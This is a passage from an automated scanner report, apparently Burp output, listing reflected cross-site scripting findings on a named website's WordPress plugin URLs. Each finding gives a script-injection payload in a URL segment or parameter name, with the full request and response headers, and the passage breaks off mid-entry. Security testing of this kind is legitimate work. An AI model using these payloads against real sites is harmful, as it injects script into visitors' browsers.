<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfb7a"><script>alert(1)</script>6b15bddf239 was submitted in the REST URL parameter 2. This input was echoed as bfb7a\"><script>alert(1)</script>6b15bddf239 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/pluginsbfb7a"><script>alert(1)</script>6b15bddf239/sexybookmarks/js/shareaholic-perf.js/page/2 HTTP/1.1 Host: www.installsoftware.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 20:18:06 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Cookie,User-Agent,Accept-Encoding Last-Modified: Mon, 31 Jan 2011 20:18:06 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47437
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af530"><script>alert(1)</script>21dd516c846 was submitted in the REST URL parameter 3. This input was echoed as af530\"><script>alert(1)</script>21dd516c846 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/sexybookmarksaf530"><script>alert(1)</script>21dd516c846/js/shareaholic-perf.js/page/2 HTTP/1.1 Host: www.installsoftware.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 20:18:38 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 WWW-Authenticate: Basic realm="Restricted Area" X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Cookie,User-Agent,Accept-Encoding Last-Modified: Mon, 31 Jan 2011 20:18:38 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47437
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d0ea"><script>alert(1)</script>b16941717be was submitted in the REST URL parameter 4. This input was echoed as 7d0ea\"><script>alert(1)</script>b16941717be in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/sexybookmarks/js7d0ea"><script>alert(1)</script>b16941717be/shareaholic-perf.js/page/2 HTTP/1.1 Host: www.installsoftware.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 20:19:10 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 WWW-Authenticate: Basic realm="Restricted Area" X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Cookie,User-Agent,Accept-Encoding Last-Modified: Mon, 31 Jan 2011 20:19:11 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47437
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef57b"><script>alert(1)</script>0e42677720 was submitted in the REST URL parameter 5. This input was echoed as ef57b\"><script>alert(1)</script>0e42677720 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/sexybookmarks/js/shareaholic-perf.jsef57b"><script>alert(1)</script>0e42677720/page/2 HTTP/1.1 Host: www.installsoftware.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 20:19:33 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 WWW-Authenticate: Basic realm="Restricted Area" X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Cookie,User-Agent,Accept-Encoding Last-Modified: Mon, 31 Jan 2011 20:19:34 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47434
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a805"><script>alert(1)</script>cf09bdcc993 was submitted in the REST URL parameter 6. This input was echoed as 8a805\"><script>alert(1)</script>cf09bdcc993 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page8a805"><script>alert(1)</script>cf09bdcc993/2 HTTP/1.1 Host: www.installsoftware.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 20:19:57 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 WWW-Authenticate: Basic realm="Restricted Area" X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Cookie,User-Agent,Accept-Encoding Last-Modified: Mon, 31 Jan 2011 20:19:57 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 44587
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd333"><script>alert(1)</script>297b5913584 was submitted in the REST URL parameter 7. This input was echoed as fd333\"><script>alert(1)</script>297b5913584 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2fd333"><script>alert(1)</script>297b5913584 HTTP/1.1 Host: www.installsoftware.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 20:20:11 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 WWW-Authenticate: Basic realm="Restricted Area" X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Cookie,User-Agent,Accept-Encoding Last-Modified: Mon, 31 Jan 2011 20:20:11 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 44587
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
1.171. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 553f5"><script>alert(1)</script>44b4574d50b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 553f5\"><script>alert(1)</script>44b4574d50b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2?553f5"><script>alert(1)</script>44b4574d50b=1 HTTP/1.1 Host: www.installsoftware.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 20:16:39 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 WWW-Authenticate: Basic realm="Restricted Area" X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Mon, 31 Jan 2011 20:16:39 GMT Vary: User-Agent,Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47475
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1840b"><script>alert(1)</script>8fd264d131a was submitted in the REST URL parameter 1. This input was echoed as 1840b\"><script>alert(1)</script>8fd264d131a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content1840b"><script>alert(1)</script>8fd264d131a/plugins/sexybookmarks/js/shareaholic-publishers.min.js HTTP/1.1 Host: www.installsoftware.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 20:16:50 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Cookie,User-Agent,Accept-Encoding Last-Modified: Mon, 31 Jan 2011 20:16:50 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 44593
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ac14"><script>alert(1)</script>36c637fbf14 was submitted in the REST URL parameter 2. This input was echoed as 4ac14\"><script>alert(1)</script>36c637fbf14 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins4ac14"><script>alert(1)</script>36c637fbf14/sexybookmarks/js/shareaholic-publishers.min.js HTTP/1.1 Host: www.installsoftware.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 20:17:21 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Cookie,User-Agent,Accept-Encoding Last-Modified: Mon, 31 Jan 2011 20:17:22 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 44593
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11f79"><script>alert(1)</script>bf35875d5a0 was submitted in the REST URL parameter 3. This input was echoed as 11f79\"><script>alert(1)</script>bf35875d5a0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/sexybookmarks11f79"><script>alert(1)</script>bf35875d5a0/js/shareaholic-publishers.min.js HTTP/1.1 Host: www.installsoftware.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 20:17:45 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 WWW-Authenticate: Basic realm="Restricted Area" X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Cookie,User-Agent,Accept-Encoding Last-Modified: Mon, 31 Jan 2011 20:17:45 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 44593
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e773"><script>alert(1)</script>e3669742604 was submitted in the REST URL parameter 4. This input was echoed as 8e773\"><script>alert(1)</script>e3669742604 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/sexybookmarks/js8e773"><script>alert(1)</script>e3669742604/shareaholic-publishers.min.js HTTP/1.1 Host: www.installsoftware.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 20:18:16 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 WWW-Authenticate: Basic realm="Restricted Area" X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Cookie,User-Agent,Accept-Encoding Last-Modified: Mon, 31 Jan 2011 20:18:17 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 44593
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload caf20"><script>alert(1)</script>4eec3538e5e was submitted in the REST URL parameter 5. This input was echoed as caf20\"><script>alert(1)</script>4eec3538e5e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.jscaf20"><script>alert(1)</script>4eec3538e5e HTTP/1.1 Host: www.installsoftware.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 20:18:49 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 WWW-Authenticate: Basic realm="Restricted Area" X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Cookie,User-Agent,Accept-Encoding Last-Modified: Mon, 31 Jan 2011 20:18:51 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 44593
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
1.177. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d752a"><script>alert(1)</script>cab60ad3b7f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d752a\"><script>alert(1)</script>cab60ad3b7f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js?d752a"><script>alert(1)</script>cab60ad3b7f=1 HTTP/1.1 Host: www.installsoftware.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 20:15:56 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 WWW-Authenticate: Basic realm="Restricted Area" X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Mon, 31 Jan 2011 20:15:56 GMT Vary: User-Agent,Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 44628
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da531"><script>alert(1)</script>024e2ce4755 was submitted in the REST URL parameter 1. This input was echoed as da531\"><script>alert(1)</script>024e2ce4755 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /da531"><script>alert(1)</script>024e2ce4755/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2 HTTP/1.1 Host: www.installsoftware.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 20:18:05 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Cookie,User-Agent,Accept-Encoding Last-Modified: Mon, 31 Jan 2011 20:18:06 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47437
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d84c"><script>alert(1)</script>bd0d34dbf9f was submitted in the REST URL parameter 2. This input was echoed as 2d84c\"><script>alert(1)</script>bd0d34dbf9f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins2d84c"><script>alert(1)</script>bd0d34dbf9f/sexybookmarks/js/shareaholic-publishers.min.js/page/2 HTTP/1.1 Host: www.installsoftware.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 20:18:38 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Cookie,User-Agent,Accept-Encoding Last-Modified: Mon, 31 Jan 2011 20:18:38 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47467
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f8ee"><script>alert(1)</script>455db0072e6 was submitted in the REST URL parameter 3. This input was echoed as 1f8ee\"><script>alert(1)</script>455db0072e6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/sexybookmarks1f8ee"><script>alert(1)</script>455db0072e6/js/shareaholic-publishers.min.js/page/2 HTTP/1.1 Host: www.installsoftware.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 20:19:10 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 WWW-Authenticate: Basic realm="Restricted Area" X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Cookie,User-Agent,Accept-Encoding Last-Modified: Mon, 31 Jan 2011 20:19:11 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47467
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1bd8"><script>alert(1)</script>5954009ca3e was submitted in the REST URL parameter 4. This input was echoed as f1bd8\"><script>alert(1)</script>5954009ca3e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
